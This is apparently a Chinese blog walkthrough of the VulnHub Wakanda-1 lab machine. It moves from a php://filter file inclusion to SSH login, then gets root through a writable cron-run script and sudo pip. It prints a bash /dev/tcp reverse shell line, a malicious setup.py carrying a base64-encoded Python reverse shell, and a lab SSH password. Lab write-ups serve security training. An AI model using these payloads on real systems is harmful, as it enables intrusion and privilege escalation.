wakanda-1靶机

最新推荐文章于 2024-09-09 18:58:08 发布
最新推荐文章于 2024-09-09 18:58:08 发布
阅读量963 收藏 13
点赞数 12
文章标签: chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/140955662
版权

环境配置
 


主机发现,注意找mac地址对应的ip
 


端口目录扫描
 


 


首页
 


查看首页源代码
 


拼接参数存在php伪协议的文件包含,包含首页文件inde.php
/?lang=php://filter/read=convert.base64-encode/resource=index
 


去在线平台base64解码,


ssh连接 mamadou : Niamey4Ever227!!!

提权
这是一个python环境,家目录下有个flag文件


查看其他目录文件

home/devops下有个flag2,但没有读取权限

在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限

还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py

os.system('/bin/bash')切换终端

将.antivirus.py文件修改为反弹shell的代码
import os
os.system("echo 'bash -i >& /dev/tcp/192.168.0.107/6767 0>&1'|bash")
kali监听

sudo -l,尝试pip的sudo提权

在tmp目录下创建恶意文件,注意修改rhost为靶机地址
from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
def run(self):
install.run(self)
RHOST = '192.168.7.11'

reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
encoded = base64.b64encode(reverse_shell)
os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
version='0.0.1',
description='This will exploit a sudoer able to /usr/bin/pip install *',
url='https://github.com/0x00-0x00/fakepip',
author='zc00l',
author_email='andre.marques@esecurity.com.br',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})

随机反弹到root的shell

Clearlove~7
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1071
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
靶机wakanda_1练习报告
黑战士的博客
05-21 549
1.熟练使用多种提权方法。
wakanda-1
weixin_52953960的博客
08-08 245
发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中。80端口没发现什么功能点,尝试ssh登录,网站首页发现一个可能作为用户的字符串。进入 devops目录,发现flag2文件,但是没有权限。网上搜了下exp,创建一个setup.py,在其中写入。查看当前权限,查看内核版本,没有找到合适的提权方式。开启临时web服务,将其下载到 /tmp 目录中。kali开启监听,等一会儿,成功反弹shell。靶机执行命令,成功反弹shell,提权成功。贴到url中,发现变成了法语。
vulnhub系列:wakanda-1
jq_j37的博客
08-08 409
vulnhub系列:wakanda-1靶机,打靶文章
wakanda:1靶机
zdd1453691081的博客
08-08 771
靶机运行环境:Virtual Box
wakanda:1靶机渗透测试
weixin_58786230的博客
08-08 856
使用命令cd /tmpls -al。
【vulnhub】Wakanda :1靶机
wbplife的博客
08-07 652
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
靶机渗透之Wakanda
qq_43235703的博客
02-02 2800
渗透靶机Wakanda wakanda简介:Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。在官网可以下载,有需要的小伙伴可以私聊我拿ova. 将wakanda.ova放进vmbox里面,要是vmware能放也可以放进去,不过vmbox可以直接加...
渗透测试靶机----Wakanda_1
久恙502的博客
07-28 28
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
wakanda-widgets:自定义小部件集成到 Wakanda 框架和 Wakanda GUI 设计器中
06-01
Wakanda-widgets 在此存储库中,您可以与社区共享您的自定义 Wakanda 小部件。 如何为创建自定义小部件 有关创建自定义小部件的信息,请参阅文档。 如何请求将您的小部件添加到此列表中 要将小部件的存储库添加到...
angular-wakanda-upload
05-22
以上就是"angular-wakanda-upload"示例的基本工作原理。通过结合AngularJS的强大功能和Wakanda的全栈JavaScript环境,我们可以构建出高效、健壮的文件上传系统。对于开发者来说,这种组合提供了一种无缝的开发体验,...
wakanda-studio-code-mirror
07-12
======================================== Wakanda Studio 的代码镜像扩展 Wakanda Studio 的基于代码镜像的代码编辑器。 特征 处理 emmet 缩写 ( ) 良好的压痕 HTML 预览(每次保存时重新加载) 编辑器的主题...
wakanda-node:Wakanda数据库的简单节点连接器
04-29
npm i -S midrissi/wakanda-node 初始化连接器 初始化程序返回一个Promise(有关更多信息,请参阅 ) var wakanda = require ( 'wakanda-node' ) ; var promise = wakanda . init ( { remote : { host : '...
wakanda-textreader
05-16
#创建对象 var TextReader = require ( "textreader" ) ;... //this call will change the position value to position + 1 #从位置读取 readFromTo(start, end) ,其中end不包含在返回的字符串中。 var str = tr
谷歌浏览器ChromeDriver 128,129,130驱动下载
最新发布
事业不等于爱好
09-09 327
ChromeDriver
Java+Selenium+ChromeDriver谷歌版环境搭建
qq_57681480的博客
09-07 580
创建一个Maven项目即可。
【MeterSphere】vnc连接不上selenium-chrome容器
春天的波菜
09-04 489
使用vnc连不上ms的selenium-chrome容器,看不到里面运行情况,以前其实可以,后来不行了,研究了一下。
谷歌浏览器 Google Chrome 禁止扩展.crx更新
肉饼弟弟
09-05 418
加载出来的扩展带有一个错误的标签,暂时没发现会自动更新,如果你还是自动更新了,自求多福吧!尝试了N种办法,修改版本号、修改HOST文件等等都无法阻止扩展的更新!
JavaScript编程精华:44个实用技巧提升开发效率
JavaScript作为一门多用途的编程语言,在全球范围内拥有广泛的运用,涵盖了Web开发、移动应用开发(如PhoneGap和Appcelerator)、以及服务器端开发(如Node.js和Wakanda)。本文将分享44个实用的JavaScript奇技淫巧...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值